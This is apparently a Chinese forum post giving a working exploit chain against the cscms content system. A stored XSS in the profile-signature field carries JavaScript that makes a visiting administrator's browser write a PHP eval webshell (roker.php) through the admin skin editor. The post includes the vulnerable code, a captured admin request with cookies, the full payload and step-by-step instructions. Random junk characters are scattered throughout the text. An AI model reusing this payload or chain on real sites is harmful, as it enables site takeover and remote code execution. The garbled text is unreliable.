|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题, e7 f; y) ]! ~9 }
官网已经修补了,所以重新下了源码
- Z) P$ g/ Z9 m因为 后台登入 还需要认证码 所以 注入就没看了。$ `* S( C1 c+ x9 x
存在 xss: z& Z% T9 W' `. i. R
漏洞文件 user/member/skin_edit.php9 [8 k9 r- C* z5 U2 E) p
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
) i8 ]2 m3 O5 \ 6 N: ]$ M) X( z S. f
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>/ }. @) s. z. v6 i% R+ |
: ]0 i* w* M% I; ]! G
</textarea></td></tr>
+ E1 u4 Z1 c4 N1 l; X7 _' ] 6 R4 ?7 V- [% f% t, f8 D
user/do.php
" i% U; N0 f% Z2 }* q
$ {" X; D9 o3 J% f! V; E
( Z9 Z8 S. m- r5 W j8 Xif($op=='zl'){ //资料
" l7 W) k/ V! E4 t9 B
/ h R2 p3 Q M9 S if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 0 C c# e% f; N% H$ B5 u
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
' M5 \ i7 w7 R% M5 }6 X
0 a7 C, V$ K Q& r( D c $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',: L0 T. F5 k3 e) Q" K9 g# R: [
* b) ~/ c. g: }+ M. @4 } CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."') E" F/ q3 Q7 y) z
where CS_Name='".$cscms_name."'";
$ |. y6 i* D- k* Q" q; F: l( X0 p9 D
" R" V+ H+ _4 v, i5 Q if($db->query($sql)){: S; g _, I/ P& m& \/ H
* b7 A, L- d1 ? T# j exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));+ _+ K( ^0 D% t: O: ^
* T8 |+ U. ?5 @& C }8 F/ A9 Q
}else{
- s! o4 e$ j6 J1 W( h0 |+ f0 V0 \ 6 @. }% x" ^$ |( S7 L* y
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
4 r t& S/ C4 D' f0 J, J" C
g7 t. v# j9 g8 A: s1 v# P0 o }
" n. C/ X* k% v; b6 m, M4 h
- u' {3 [" e" S$ o% T
4 N8 z# u, g8 G1 [0 N+ e没有 过滤导致xss产生。
: a! O# h7 v$ R3 {8 [5 }后台 看了下 很奇葩的是可以写任意格式文件。。
9 p0 ~8 w8 Z' b! N. K# h抓包。。/ x) S% h& H2 y0 @; E
- C* l% n3 H u0 ^4 b) o4 Z6 O0 A% b' P! N0 C
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
) d8 x- z% r2 w. C4 ?
( s# y' S% e+ ^; z# ?7 H( \9 EAccept: text/html, application/xhtml+xml, */*
z9 x p# ^ E
8 U. B$ ~5 _) X0 b. o* UReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php) Y$ Y3 |0 K, Q$ v" ~: L$ N+ Y
, r$ Q! X& S& M! k5 l
Accept-Language: zh-CN
7 h1 S) P; Z# u0 V1 o7 H
1 {2 a, e' _: M GUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)% R. Z; q8 J8 X
/ c1 z' A( v; ?+ @7 xContent-Type: application/x-www-form-urlencoded
4 U. ]% t! q* Z' k3 ~8 G, {* ]
. M9 c \, h l5 P* s, G% ?. rAccept-Encoding: gzip, deflate
. L2 u; A8 G @' c \+ G; H5 S/ ], [; V , l! O/ T) E' {+ B* P
Host: 127.0.0.1: |/ R/ B7 ]" }! ?. Z: |
' u, u4 F, S+ I4 h
Content-Length: 38
+ `; |6 t; Z7 z* _
) s1 I' u o3 K4 j: {DNT: 1
; m* n' u, n) H* w4 a4 U/ L' r
! y7 l; K* b, k" e& f% j+ hConnection: Keep-Alive1 r# _& B& T; w* ]0 A
! e# }! Y' x3 P6 ^4 ~: BCache-Control: no-cache
0 b& G+ q% e3 I8 x8 L& W2 @ # s- r2 r6 R( o- @, V) s' G b3 K
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594+ b% H) q4 g! R" m- ^3 H8 O
: Z" o5 \0 k1 _0 m$ u/ o, `. Q& ?. f% y: q
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
4 \* a' B% w" C& w0 G0 n3 `6 I8 t m1 Z6 ~* J1 a% O/ O6 z
2 Z5 b- s' Y% V) n$ P
$ }; _: p6 _9 }& I+ O
于是 构造js如下。
3 ^" Q: O4 g) W- Q4 R+ N: _0 [- H8 K3 n: a% b6 C2 T8 o+ k
本帖隐藏的内容<script> ' M8 d D$ S$ L$ \
thisTHost = top.location.hostname;
" y4 g! {' ]/ C7 P2 g
; F1 x( w0 N/ A: |' pthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
" }0 {7 _( o7 u! I+ T
* ~& h+ _& R. c$ K' f9 Kfunction PostSubmit(url, data, msg) { ( e+ _3 r D9 e* ]" ^- M% q
var postUrl = url;
% T/ A, L3 v' ~$ L5 a* { . T' r4 P i3 Y
var postData = data;
5 s) h5 u9 u! `, h0 R var msgData = msg; - W# }5 F! R: ~) R, H) V& a+ {# [/ x) C
var ExportForm = document.createElement("FORM"); , H- p3 l; G7 \8 d+ l# c$ G* q
document.body.appendChild(ExportForm); # I- E* i0 r" J- @( m: S+ {
ExportForm.method = "POST"; 1 f& L/ F0 I3 R( p/ t3 j
var newElement = document.createElement("input"); . d: ?$ Y. p, `6 a
newElement.setAttribute("name", "name"); ! }; E( S: U4 V. s
newElement.setAttribute("type", "hidden");
! @% p# q" z, w2 Q' W var newElement2 = document.createElement("input"); ' t6 I: f3 I) p z( g
newElement2.setAttribute("name", "content");
9 i7 c. E" H+ W( W( z newElement2.setAttribute("type", "hidden"); * E- v: U: I! x/ |$ |5 |. r
ExportForm.appendChild(newElement);
0 e7 a0 L% C l: ?+ y9 }, G ExportForm.appendChild(newElement2); 7 S: x r& ]% f* P; e
newElement.value = postData;
; g# ?$ \# a4 |1 Q" E! p4 n- N newElement2.value = msgData;
; N) [9 d0 [: d, i& u ExportForm.action = postUrl;
- T8 O4 X2 `8 W, _ ExportForm.submit(); . L) z0 o1 a8 N" o3 b
};
! o0 h0 [! ] Z+ r, |1 w. ` / f H9 _/ V8 F5 ]0 `
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* @8 ]- r' Z9 _ o) l
" b9 ~9 ?1 V% i0 ~# T
</script>7 {7 u# x' r/ w2 o- Z: }8 g0 \
4 G% o; d8 W# H+ @ {
8 m& F) e! ^0 i" K. g/ n5 Y* S3 R8 q) v
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入7 @- S& Z; C( H6 H9 V
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改), M' x4 t8 ~7 s* J* c
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
# C8 l' z( v# _" ~$ o c |
|